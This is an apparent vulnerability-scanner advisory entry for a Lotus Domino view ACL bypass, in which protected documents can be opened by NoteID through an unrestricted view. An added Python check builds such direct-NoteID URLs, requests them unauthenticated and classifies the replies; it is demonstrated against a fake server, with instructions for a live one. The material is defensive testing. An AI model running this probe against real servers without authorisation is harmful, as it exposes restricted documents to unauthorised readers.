| Field | Value |
|---|---|
| VID | 22063 |
| Severity | 30 |
| Port | 80, ... |
| Protocol | TCP |
| Class | WWW |
| Detailed Description | The Lotus Domino web server contains a 'View' ACL bypass vulnerability. Lotus Domino is an application server developed by IBM. One of its features is remote user interaction with a Lotus Notes database through a web-based interface. Lotus Notes documents are organized into 'Views' in Lotus Domino, and to protect sensitive documents it is possible to place an ACL on a view so that the restriction covers all documents within that view. Lotus Domino 5.x contains a vulnerability whereby any Notes document can be opened from any view simply by manually specifying the document's NoteID in the URL, so a restriction that exists only on the view is bypassed. As an example, examine the Statistics Reporting database, statrep.nsf. Opening the Events view with http://target/statrep.nsf/136/?OpenView (136 is the NoteID of the Events view) lists some documents. References: http://www.securityfocus.com/bid/3489 , http://www.securiteam.com/securitynews/6W0030U35W.html |
| Recommendation | An ACL (Access Control List) placed on a view does not by itself protect the documents in that view, because a document can be opened by NoteID through any other view. Restrict access on the documents themselves (document-level access control such as Reader fields) and in the database ACL rather than relying on the view-level ACL. |
| Related URL | (CVE) |
| Related URL | (SecurityFocus) |
| Related URL | (ISS) |
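The following check, added here as an example and not part of the original entry or of any IBM tooling, verifies whether a Domino database serves documents that should be protected when they are requested by NoteID through an unrestricted view. It assumes the documented Domino URL form /<db>.nsf/<view>/<docNoteID>?OpenDocument, that a tester who can legitimately open the restricted view first collects its document identifiers, and that the HTTP fetch function is injected, so the module runs offline against a constructed fake server. The restricted view NoteID 8a2, the document identifiers and the HTML are constructed sample data; only statrep.nsf and the Events view NoteID 136 come from the advisory.

```python
"""Check whether a Domino database serves protected documents when they are requested
by NoteID through an unrestricted view (the bypass described in this advisory).

Added example, not part of the original entry or of IBM's tooling. Assumptions: the
documented Domino URL form  /<db>.nsf/<view>/<docNoteID>?OpenDocument ; a tester who
can legitimately open the restricted view collects its document identifiers first;
the fetch function is injected so the module runs offline against a fake server.
"""
import re
from typing import Callable, Dict, Iterable, List, Tuple

# Links Domino emits for documents inside a ?OpenView page. The identifier may be a
# NoteID or the 32-hex-char UNID, so any run of hex digits is accepted (assumption).
_DOC_LINK = re.compile(r'href="[^"]*?/([0-9A-Fa-f]+)\?OpenDocument"', re.IGNORECASE)

Fetch = Callable[[str], Tuple[int, str]]  # url -> (HTTP status, body)


def extract_doc_ids(open_view_html: str) -> List[str]:
    """Document identifiers linked from a ?OpenView page, lower-cased, de-duplicated, in order."""
    seen: Dict[str, None] = {}
    for doc_id in _DOC_LINK.findall(open_view_html):
        seen.setdefault(doc_id.lower(), None)
    return list(seen)


def build_probe_url(base: str, database: str, view_id: str, doc_id: str) -> str:
    """Direct-NoteID document URL under the given view (Domino URL syntax)."""
    return f"{base.rstrip('/')}/{database}/{view_id}/{doc_id}?OpenDocument"


def probe_view_bypass(base: str, database: str, open_view: str,
                      protected_doc_ids: Iterable[str], fetch: Fetch) -> Dict[str, str]:
    """Request each protected document through an unrestricted view, unauthenticated.

    served  : 2xx with a body, the document is readable despite the view ACL (vulnerable)
    denied  : 401/403, document-level protection held
    missing : 404, identifier not present in this database
    other   : anything else, inspect by hand
    """
    results: Dict[str, str] = {}
    for doc_id in protected_doc_ids:
        status, body = fetch(build_probe_url(base, database, open_view, doc_id))
        if 200 <= status < 300 and body.strip():
            results[doc_id] = "served"
        elif status in (401, 403):
            results[doc_id] = "denied"
        elif status == 404:
            results[doc_id] = "missing"
        else:
            results[doc_id] = "other"
    return results


# ---- constructed sample data, not captured from a real server ----
# What an authorised user sees when opening the hypothetical restricted view '8a2'.
RESTRICTED_VIEW_HTML = """
<html><body>
<a href="/statrep.nsf/8a2/8f6?OpenDocument">Sensitive report 1</a>
<a href="/statrep.nsf/8a2/8fa?OpenDocument">Sensitive report 2</a>
<a href="/statrep.nsf/8a2/8f6?OpenDocument">duplicate link</a>
<a href="/statrep.nsf/8a2?OpenView">refresh</a>
</body></html>
"""
PROTECTED_DOCS = {"8f6", "8fa"}   # documents that only the restricted view should reveal
EVENTS_VIEW = "136"               # the unrestricted Events view NoteID from the advisory


def make_fake_server(vulnerable: bool) -> Fetch:
    """Anonymous-client view of a Domino server with (vulnerable) or without the flaw."""
    def fetch(url: str) -> Tuple[int, str]:
        m = re.search(r"/statrep\.nsf/([0-9a-f]+)/([0-9a-f]+)\?OpenDocument$", url, re.I)
        if not m:
            return 400, ""
        view_id, doc_id = m.group(1).lower(), m.group(2).lower()
        if doc_id not in PROTECTED_DOCS | {"1a2"}:
            return 404, ""
        if view_id == "8a2":            # restricted view path: its ACL is always enforced
            return 403, ""
        if doc_id in PROTECTED_DOCS and not vulnerable:
            return 403, ""              # document-level protection (e.g. Reader fields) holds
        return 200, f"<html>document {doc_id}</html>"
    return fetch


def run_demo(vulnerable: bool) -> Dict[str, str]:
    ids = extract_doc_ids(RESTRICTED_VIEW_HTML) + ["abc"]   # 'abc' does not exist
    return probe_view_bypass("http://target", "statrep.nsf", EVENTS_VIEW, ids,
                             make_fake_server(vulnerable))


if __name__ == "__main__":
    for flag in (True, False):
        print("vulnerable server:" if flag else "fixed server:     ", run_demo(flag))
```

Against a live server, replace make_fake_server with a function that issues the request without credentials (urllib or requests) and returns the status and body; a result of "served" for a document that the restricted view is meant to hide confirms that the view ACL alone is not protecting it.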